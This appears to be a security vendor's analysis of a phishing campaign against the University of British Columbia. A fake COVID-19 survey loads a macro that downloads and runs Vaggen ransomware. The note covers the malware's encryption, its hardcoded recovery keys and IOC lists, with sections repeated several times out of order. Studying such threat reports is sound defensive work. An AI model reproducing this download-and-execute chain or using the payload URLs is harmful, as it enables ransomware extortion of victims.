Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2960 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2961 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2962 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2963 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2964 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2965 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2966 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2967 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2968 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2969 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2970 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2971 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2972 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2973 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2974 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2975 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2976 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2977 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2978 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2979 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2980 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2981 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2982 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2983 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2984 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2985 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2986 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2987 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2988 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2989 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2990 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2991 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2992 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2993 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\